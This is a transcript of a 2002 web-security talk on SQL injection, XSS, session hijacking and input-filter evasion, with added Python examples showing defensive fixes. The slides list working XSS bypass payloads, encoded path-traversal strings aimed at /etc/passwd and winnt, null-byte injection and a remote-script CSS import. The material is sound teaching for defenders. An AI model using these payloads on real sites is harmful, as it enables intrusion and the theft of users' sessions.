Mar 26, 2015

Page 1:
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman

Taking Aim at Web Applications

Dennis Groves

Bill Pennington

Page 2:

Introduction

Bill Pennington, Principal Consultant, Guardent

Tested over 300 web applications over the past 3 years

Page 3:

Dennis Groves

Specialty: Enterprise Security, Web Application Security, Pen-Testing & Quality Assurance.

Bio: Dennis is currently the Director of Internet Security Consulting for Centerstance, Inc. For the last 3 years his primary focus has been on Web Application Security. He is a founding member of the Open Web Application Security Project (OWASP) and a former Sanctum employee who played a key role in the development of AppScan.

Page 4:

Why is this important?

Page 5:

Topics

This is not new

Why your firewall doesn’t matter

Types of attacks

Filter, Filter, Filter

Do you know where your data is?

Tools to help you

Page 6:

This is Not New

The problems with web applications are the same problems found in standalone applications

Page 7:

Why your Firewall doesn’t matter

Standard rant

Page 8:

Top 5 Vulnerabilities

SQL insertion

XSS

Session Hijacking

Parameter manipulation

Unbounded file calls

Page 9:

Cross site scripting: why you should care

XSS is not an attack on the server, it is an attack on the users of your application

So what?

Identity theft

User masquerading

Reputation risk

Page 10:

SQL Insertion (SQL injection)

Most common on MS based applications.

Any application that builds SQL from user input is vulnerable, whatever the database (Oracle, Sybase, DB2…)

Can lead to full compromise of the server (xp_cmdshell on MS SQL Server)

Almost guaranteed to lead to data compromise

Demo…
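The demo itself is not in the transcript. As an added example, not the authors' demo and not tied to MS SQL Server, the following Python script shows the bug against SQLite: the same login query built two ways, the two classic payloads from this era (a tautology and a comment), and the parameterised form that defeats both. The table, user names and passwords are constructed for this example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database for this example (not from the slides).
    Passwords are stored in clear only to keep the injection visible; a real
    application stores a salted hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def vulnerable_login(conn, username: str, password: str) -> bool:
    # The query text is assembled from user input, so a quote in the input
    # ends the string literal and the rest of the input becomes SQL.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def safe_login(conn, username: str, password: str) -> bool:
    # Parameterised query: the SQL text is fixed and the values travel
    # separately, so quotes, comments and OR clauses in the input stay data.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def demo() -> dict:
    conn = make_db()
    tautology = "' OR '1'='1"    # closes the literal, adds an always-true clause
    comment = "alice' --"        # closes the literal, comments out the password check
    return {
        "vulnerable_legit":     vulnerable_login(conn, "alice", "correct horse"),
        "vulnerable_tautology": vulnerable_login(conn, "nobody", tautology),
        "vulnerable_comment":   vulnerable_login(conn, comment, "wrong"),
        "safe_legit":           safe_login(conn, "alice", "correct horse"),
        "safe_tautology":       safe_login(conn, "nobody", tautology),
        "safe_comment":         safe_login(conn, comment, "wrong"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:22s} -> {'logged in' if ok else 'denied'}")
```

The tautology works because `AND` binds tighter than `OR`, so the WHERE clause becomes `(username = 'nobody' AND password = '') OR '1'='1'` and matches every row; the comment form simply discards the password check. Neither has any effect on the parameterised query, and the same pattern (fixed SQL text, values bound separately) is what every driver for Oracle, Sybase or DB2 offers.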

Page 11:

Cross Site Scripting (XSS)

Found in 98% of applications I test

2 main types:

Transient (URL based)

http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>

Sticky – script placed in a static bit of web content

Page 12:

XSS continued…

Transient generally requires user interaction

What can happen? The possibilities are only restricted by the client

Cookie theft is the most common example

But I filter "<" and ">"… JScript entities: "&{alert('Test')};"

Page 13:

Session Hijacking

HTTP is stateless so application designers must build a way to track state

Cookies and URL strings are the most common ways to track state

Both are easily exploitable

Page 14:

Session Hijacking continued…

Generally the next thing to occur after XSS

Please, people: logout means logout!

Examples of common session tracking issues
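The slide's examples are not in the transcript. As an added example, not the authors' code, here is a minimal server-side session store in Python that avoids the issues the two session slides point at: the cookie carries only an unguessable handle, idle sessions expire on the server, the id is rotated after login, and logout really destroys the session rather than just clearing the browser's cookie. Class and method names are this example's own.

```python
import secrets
import time


class SessionStore:
    """Server-side session table. The cookie carries only an unguessable handle;
    all state, and the decision whether the session is still alive, stays here."""

    def __init__(self, idle_timeout=900.0):
        self._sessions = {}          # session id -> {"user": str, "last_seen": float}
        self.idle_timeout = idle_timeout

    def create(self, user, now=None):
        # 32 bytes from the OS CSPRNG: no counter, timestamp or username to guess from.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user,
                               "last_seen": time.time() if now is None else now}
        return sid

    def user_for(self, sid, now=None):
        """Return the user bound to `sid`, or None if it is unknown or idle too long."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        now = time.time() if now is None else now
        if now - rec["last_seen"] > self.idle_timeout:
            del self._sessions[sid]  # expire on the server, not only in the browser
            return None
        rec["last_seen"] = now
        return rec["user"]

    def rotate(self, sid):
        """Issue a fresh id for an existing session (do this right after login, so an
        id handed out before authentication is never the id of an authenticated user)."""
        rec = self._sessions.pop(sid, None)
        if rec is None:
            return None
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = rec
        return new_sid

    def logout(self, sid):
        # "Logout means logout": the server forgets the session, so a copy of the
        # cookie taken earlier (by XSS, a shared machine, a proxy log) stops working.
        self._sessions.pop(sid, None)

    @staticmethod
    def cookie_header(sid):
        """Set-Cookie line for the id: unreadable by script (HttpOnly), never sent
        in clear (Secure), scoped to the application path."""
        return f"Set-Cookie: sid={sid}; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    store = SessionStore(idle_timeout=60)
    sid = store.create("alice")
    print(store.cookie_header(sid))
    print(store.user_for(sid))      # alice
    store.logout(sid)
    print(store.user_for(sid))      # None: the handle is dead on the server
```

The `now` parameter exists only so that expiry can be exercised deterministically; production code passes nothing and the store uses the clock. Storing `user` against the id on the server is also what removes the parameter-tampering surface: nothing about who the user is ever travels in the cookie.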

Page 15:

Parameter Tampering

Programmers will store data anywhere!

URL parameters – http://badapp.com/checkout.pl?p=$1.00

Cookies – Cookie: p=$1.00

Hidden fields – not really hidden

Page 16:

Unbound File Calls

Ye Olde ../../

Watch out that you don't display important information (global.asa)

Most application languages will take URLs as file arguments

Page 17:

Do you know where your data is?

Building an exclusionary filter is difficult because your data is all over the place

Page 18:

Data Flow example

Page 19:

Designing a proper filter

Make all filters default deny

Don't try to exclude "bad stuff"

Try to get a good idea where your data is going

Log all filter violations
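The three rules on this slide, as an added Python example that is not the authors' code: one allow-list rule per parameter, everything unknown or non-matching rejected (default deny), and every rejection logged and reported. The parameter names and patterns are this example's own assumptions about a small checkout-style form.

```python
import logging
import re

log = logging.getLogger("webapp.filter")

# Allow-list of what each parameter may look like (names are this example's).
# Anything that is not listed, or does not match, is rejected: default deny.
RULES = {
    "qty":  re.compile(r"[1-9][0-9]{0,3}"),             # 1-9999, no sign, no decimals
    "msg":  re.compile(r"[A-Za-z0-9 .,!?'\-]{1,200}"),  # plain text; no < > & { " / \
    "file": re.compile(r"[a-z0-9_]{1,32}"),             # bare basename: no dots, no slashes
}


def check_request(params):
    """Return (clean, violations). `clean` holds only the parameters that passed;
    every rejection is logged and reported, so probing shows up in the logs."""
    clean, violations = {}, []
    for name, value in params.items():
        rule = RULES.get(name)
        if rule is None:
            reason = "unknown parameter"
        elif not isinstance(value, str) or not rule.fullmatch(value):
            reason = "value does not match allow-list"
        else:
            clean[name] = value
            continue
        violations.append((name, reason))
        # Log the offending value truncated and repr()'d, so the log line itself
        # cannot carry control characters or HTML into whatever reads the log.
        log.warning("filter violation: %s (%s=%r)", reason, name, str(value)[:80])
    return clean, violations


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    print(check_request({"qty": "3", "msg": "Hello, world!"}))
    print(check_request({"msg": "<SCRIPT>alert('Test');</SCRIPT>"}))
    print(check_request({"file": "../../etc/passwd", "p": "$1.00"}))
```

Note that the `msg` rule never mentions `<SCRIPT>` or `&{`: because it lists what is allowed rather than what is forbidden, encoded, mixed-case and entity variants are all rejected without being enumerated. `fullmatch` (not `match` or `search`) is what makes a trailing newline or any other suffix fail the rule.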

Page 20:

Examples

ASP

PHP

Jscript

Perl

Page 21:

Bypassing poorly designed filters

All warfare is based on deception…If he is in superior strength, evade him.

–Sun Tzu, The Art of War, 500BC 

Page 22:

Evasion is the art of blending in so you will not be noticed; of course this age old technique of survival is still useful today.

evade

1. to escape or avoid somebody or something, usually by ingenuity or guile

2. to avoid doing something unpleasant, especially something that is a moral or legal obligation

3. to avoid dealing with or responding directly to something

4. to be difficult or impossible for somebody to find, obtain, or achieve (formal)

Page 23:

Filter Bypassing is a technique to evade detection by filtering systems.

Filter Bypassing techniques come in many varieties when applied to the many facets of web application security. The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.

Many of the described techniques can be highly effective when used properly and become even more powerful when used in combination.

Page 24:

Most filter systems are very simple, as the flow chart shows.

Seven forms of ingenuity:

URL Encoded Strings

Double Hex Encoding

Unicode Encoded String

Long URLs

Case Sensitivity

XSS Filter-Bypass Manipulation

Null Character Injection

Evade: 1. to escape or avoid somebody or something, usually by ingenuity or guile…

Page 25:

The Hex Advantage

By URL hex encoding URL strings, it may be possible to circumvent filter security systems and IDS.

http://foo.com/cgi?file=/etc/passwd

Can become:

http://foo.com/cgi?file=/%2F%65%74%63%2F%70%61%73%73%77%64

Page 26:

Double Hex Encoding

In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.

The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.

An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.

When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.

IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.

This secondary decoding was the source of another vulnerability.

Page 27:

IIS Double Hex

Round 1 Decoding:
scripts/..%255c../winnt
becomes:
scripts/..%5c../winnt
(%25 = "%" character)

Round 2 Decoding:
scripts/..%5c../winnt
becomes:
scripts/..\../winnt

Directory path traversal is now possible using path obfuscation through Double Hex Encoding.

Page 28:

The Unicode Slash

"%c0%af" is an overlong UTF-8 encoding of a slash ("/"): a conforming decoder rejects it, because "/" must be encoded as the single byte 0x2F, but the IIS decoder accepted it as the equivalent of a slash.

Therefore the common URL IIS exploit:
scripts/..%c0%af../winnt

becomes:
scripts/../../winnt

Once again, directory path traversal is now possible using path obfuscation through Unicode.
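The two IIS bugs on the preceding slides share one root cause: the security check ran before the last transformation of the path. The following Python model is an added example, not the slides' content and not IIS source; `WEBROOT`, the order of operations in `iis_style_open`, and the lenient decoder are this example's assumptions. `safe_open` shows the fix: decode exactly once, strictly, canonicalise (which also collapses repeated slashes and `..` components), and check the final path last.

```python
import posixpath
from urllib.parse import unquote_to_bytes

WEBROOT = "/var/www"   # assumed document root for the example


def resolve(rel: str) -> str:
    """Join a request path onto WEBROOT and canonicalise it ('..', '//', '/./')."""
    return posixpath.normpath(posixpath.join(WEBROOT, rel.lstrip("/")))


def inside_root(full: str) -> bool:
    return full == WEBROOT or full.startswith(WEBROOT + "/")


def lenient_utf8(data: bytes) -> str:
    """Decoder that, like the vulnerable IIS, accepts overlong two-byte forms
    such as C0 AF for '/'. A conforming decoder rejects them."""
    out, i = [], 0
    while i < len(data):
        c = data[i]
        if c < 0x80:
            out.append(chr(c))
            i += 1
        elif 0xC0 <= c <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((c & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def iis_style_open(path: str):
    """Model of the vulnerable order: %-decode once, run the security check on
    those bytes, and only afterwards decode UTF-8 (leniently) and %-decode a
    second time. Returns the path the filesystem would open, or None if blocked."""
    once = unquote_to_bytes(path)
    if not inside_root(resolve(once.decode("latin-1"))):
        return None                                  # the check fires on plain '..'
    text = lenient_utf8(once)                        # C0 AF turns into '/'
    twice = lenient_utf8(unquote_to_bytes(text))     # the superfluous second round
    return resolve(twice.replace("\\", "/"))         # Windows treats '\' as a separator too


def safe_open(path: str):
    """Hardened order: one round of %-decoding, strict UTF-8, canonicalise, and
    check the final path last. No decoding of any kind happens after the check."""
    try:
        text = unquote_to_bytes(path).decode("utf-8")   # strict: C0 AF raises
    except UnicodeDecodeError:
        return None
    if "\x00" in text:
        return None
    full = resolve(text.replace("\\", "/"))
    return full if inside_root(full) else None


if __name__ == "__main__":
    for p in ("scripts/../../winnt", "scripts/..%255c../winnt", "scripts/..%c0%af../winnt"):
        print(f"{p:28s} vulnerable -> {iis_style_open(p)!s:36s} hardened -> {safe_open(p)}")
```

In the vulnerable order `..%5c..` is just an odd file name when the check runs, and only becomes `..\..` afterwards; in the hardened order the same request resolves to a harmless non-existent file under the root, because nothing decodes `%5c` after the check. The overlong sequence is rejected outright by the strict decoder, which is the correct answer for any input that is not valid UTF-8.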

Page 29:

Double Slash

Double slash: using multiple directory slashes in URLs, for example http://www.foo.com/..//etc//passwd.

Can be used to move under the radar of IDS systems while still functioning properly.

Page 30:

Long URLs

Many systems put limits on how much data a variable can store or a system can handle.

Often, if these limits are exceeded, the data will still be used but will bypass certain security considerations.

URLs such as:
http://www.foo.com/cgi?param=filename

Replaced with:
http://www.foo.com/cgi?param=<2K_of_Data>

Page 31:

Case Sensitivity

Case sensitivity may play a role in many security filtration systems. Alternating case on URL parameters may be used to bypass certain restrictions.

http://foo.com/cgi?param=bar
http://foo.com/cgi?param=BaR
http://foo.com/CGI?param=BAR

Page 32:

Method Switching

Many web applications do not properly perform HTTP Request Method sanity checking.

Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.

Most web servers do not log "POST" data and thus forensic analysis is harder to perform.

The Request Method: GET /cgi-bin/some.cgi

can become: POST /cgi-bin/some.cgi

Page 33:

The Method token indicates the method to be performed on the resource identified by the Request-URI.

HTTP 1.1 Methods

OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
CONNECT

Page 34:

Using your “HEAD”

The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.

Scans and web application attacks can be made to be more effective using this technique.

Page 35:

Null Character Injection

Hex encoded null characters can be used to thwart some security mechanisms.

This happens because in the "C" programming language, a null character designates the end of a string.

So if a CGI appends ".html" to an input parameter:

http://foo.com/cgi?file=../../etc/passwd%00

will cut off the appended ".html".
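The slide's CGI, as an added Python example that is not the authors' code: the handler appends ".html" and the resulting string really does end in ".html", but the C library that eventually opens the file stops counting at the first NUL. `c_strlen` asks the real libc through `ctypes` so the truncation is observed rather than simulated; `TEMPLATE_DIR` and the function names are this example's own.

```python
import ctypes
import ctypes.util
import re
from urllib.parse import unquote_to_bytes

TEMPLATE_DIR = b"/var/www/templates/"   # assumed layout for the example


def c_strlen(data: bytes) -> int:
    """Length of `data` as the C library counts it: stops at the first NUL byte."""
    libc = ctypes.CDLL(ctypes.util.find_library("c"))  # on Linux, None also resolves libc
    libc.strlen.argtypes = [ctypes.c_char_p]
    libc.strlen.restype = ctypes.c_size_t
    return libc.strlen(data)


def vulnerable_template_path(param: str) -> bytes:
    """The CGI pattern from the slide: decode the parameter and append '.html',
    meant to guarantee that only .html files under TEMPLATE_DIR are ever opened."""
    return TEMPLATE_DIR + unquote_to_bytes(param) + b".html"


def effective_path(path: bytes) -> bytes:
    """What a C open()/fopen() actually receives from that byte string."""
    return path[: c_strlen(path)]


_NAME = re.compile(rb"[a-z0-9_]{1,32}")


def hardened_template_path(param: str):
    """Allow-list the decoded name before building the path. A NUL, a slash or a
    dot cannot match, so nothing reaches the C layer with a hidden terminator."""
    name = unquote_to_bytes(param)
    return TEMPLATE_DIR + name + b".html" if _NAME.fullmatch(name) else None


if __name__ == "__main__":
    built = vulnerable_template_path("../../etc/passwd%00")
    print("string the CGI built :", built)          # ends in b'.html'
    print("string C will open   :", effective_path(built))
    print("hardened             :", hardened_template_path("../../etc/passwd%00"))
```

Python's own `open()` refuses the vulnerable path with `ValueError: embedded null byte`, which is why the example asks libc directly; the Perl and C CGIs of the era had no such guard, and the check "does it end in .html?" passed because, in the language doing the checking, it did.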

Page 36:

Unicode (UTF-8) Encoded

Unicode is a universal way to represent characters.

However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.

Microsoft IIS has had security issues in the past while supporting unicode.

Page 37:

URL Encoded String

The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:

"...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."

Page 38:

XSS Filter-Bypass Manipulation

This technique is used to pass various types of client-side scripting language through implemented security filters.

The idea is to be able to achieve client-side execution of a client-side script.

There are several techniques used to perform this attack.

Page 39:

Test the Filters

Submit all the raw HTML tags you can find, and then view the output results.

Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript event handlers).

This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.

Page 40:

SRCing the protocol

Using the “javascript” protocol in an HTML source attribute.

<IMG SRC="javascript:js_expression">

<IMG SRC="javascript:alert('test');">

Page 41:

Alternate Protocol SRCing

Same technique as the previous one; however, using the protocols "livescript" and "mocha" (Netscape's older names for JavaScript) will yield the same effect.

<IMG SRC="livescript:js_expression">

<IMG SRC="mocha:alert('test');">

Page 42:

Decimal HTML Entities

A variation on the previous techniques: using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.

<IMG SRC="java&#010;script:js_expression">

Entity values 9 through 13 (tab, line feed, vertical tab, form feed, carriage return) have all been seen to work.

Page 43:

Hex HTML Entities

Another variation on the previous example: hex HTML entities may also be used to bypass filter restrictions, yet execute JavaScript.

<IMG SRC="java&#X0A;script:js_expression">

Page 44:

Padding HTML Entities

Padding HTML entities with "0"s may also be used to bypass the filters, yet still execute JavaScript.

<IMG SRC="java&#000009;script:js_expression">
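The entity, case and alternate-protocol bypasses of pages 40 through 44, and the filter-probing method of page 39, as one added Python example (not the authors' code). The deny-list filter is the kind the deck calls poorly designed; `browser_scheme` approximates what the browsers of the day did with a SRC value before dispatching on its scheme, which is the normalisation the filter never performs; `safe_src` is the default-deny replacement. The probe strings are constructed from the slides' payloads, and the function names are this example's own.

```python
import html
import re


# A "poorly designed" filter: a deny-list of literal strings, applied once to
# the raw, undecoded input.
def denylist_filter(fragment: str) -> str:
    for bad in ("<script", "javascript:", "onload=", "onerror="):
        fragment = fragment.replace(bad, "")
    return fragment


def probe_filter(filter_fn, probes):
    """Page 39's method: submit raw HTML and see what comes back unchanged."""
    return [p for p in probes if filter_fn(p) == p]


# Constructed probe set modelled on the slides' payloads.
PROBES = [
    '<SCRIPT>alert("Test");</SCRIPT>',
    '<IMG SRC="javascript:alert(\'test\');">',
    '<IMG SRC="JaVaScRiPt:alert(\'test\');">',
    '<IMG SRC="java&#010;script:alert(\'test\');">',
    '<IMG SRC="java&#X0A;script:alert(\'test\');">',
    '<IMG SRC="java&#000009;script:alert(\'test\');">',
    '<IMG SRC="mocha:alert(\'test\');">',
]

_CONTROL = re.compile(r"[\x00-\x1f]")


def browser_scheme(attr_value: str) -> str:
    """Approximation of how the browsers of the day read a SRC/HREF value: HTML
    entities are decoded first (decimal, hex and zero-padded alike), ASCII
    control characters inside the scheme are ignored, and the scheme name is
    matched case-insensitively."""
    canon = _CONTROL.sub("", html.unescape(attr_value)).lstrip()
    m = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", canon)
    return m.group(1).lower() if m else ""


_SAFE_URL = re.compile(r"https?://[A-Za-z0-9._~/-]+")


def safe_src(attr_value: str):
    """Default-deny replacement: canonicalise the same way the browser will, then
    accept only a plain http/https URL built from a small character set.
    Returns the canonical value, or None when the value is rejected."""
    canon = _CONTROL.sub("", html.unescape(attr_value))
    return canon if _SAFE_URL.fullmatch(canon) else None


if __name__ == "__main__":
    for p in probe_filter(denylist_filter, PROBES):
        print("passes the deny-list unchanged:", p)
    for v in ("java&#010;script:alert(1)", "JaVaScRiPt:alert(1)", "http://www.example.com/a.gif"):
        print(f"{v:32s} browser sees scheme {browser_scheme(v)!r:14s} safe_src -> {safe_src(v)}")
```

Six of the seven probes come back untouched, including the upper-case `<SCRIPT>` tag, because the filter compares literal bytes while the browser compares a decoded, control-stripped, case-folded value. `safe_src` does the decoding itself and then has nothing to enumerate: anything that is not a plain http/https URL after canonicalisation is rejected, whatever encoding tricks were used to get there. The `&{...}` JScript entity from page 12 is not touched by `html.unescape` and would fail `_SAFE_URL` for the same reason.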

Page 45:

STYLE JavaScript Type

Changing the MIME type on a "style" tag may be used to execute JavaScript.

<style TYPE="text/javascript">JS EXPRESSION</style>

<style TYPE="text/javascript">alert(document.domain);</style>

Page 46:

STYLE JavaScript X-Type

Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.

<STYLE TYPE="application/x-javascript">

alert('JavaScript has been Executed');

</STYLE>

Page 47:

STYLE JavaScript Import

Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.

<style TYPE="text/css">

@import url(javascript:alert('Javascript is executed'));

</style>

Page 48:

STYLE URL Import

Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.

<STYLE type=text/css>

@import url(http://www.test.com);

</STYLE>

Page 49:

LINK Style Sheet

The “LINK” tag can be used to import JavaScript from a remote HTTP resource.

<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">

Page 50:

Style Left Expression

A few CSS features used together to execute JavaScript (Internet Explorer's CSS expression() extension).

<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >

Page 51:

Remote SRCing

A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in JavaScript from remote resources.

<LAYER SRC="js.html"></LAYER>

Page 52:

AND CURLY

<IMG SRC="&{javascript_expression};">

<IMG SRC="&{alert('alert')};">

Syntax must be exact.

Page 53:

Dangerous HTML Tags

"All HTML is to be considered dangerous, but these tags are the most insidious."

<APPLET> <BODY> <EMBED> <FRAME> <FRAMESET> <HTML> <IFRAME> <IMG> <LAYER> <ILAYER> <META> <OBJECT> <SCRIPT> <STYLE>

Page 54:

Dangerous HTML Attributes

(HTML tags with these attributes.)

SRC

LOWSRC

STYLE

HREF

Page 55:

Why automated tools don't work very well

Every programmer does things a little differently

Authentication schemes are hard to automate

Error codes are not standardized

Sometimes simple things like SSL get in the way

Some good things:

Completeness

Large knowledge bases (at least possibly)

Page 56:

Why people are better

Recognition of subtle errors

We understand the impact and therefore the risk of a vulnerability

We can find “real” bugs, flaws in logic

Page 57:

One tool to rule them all…

Page 58:

Conclusion

Page 59:

Questions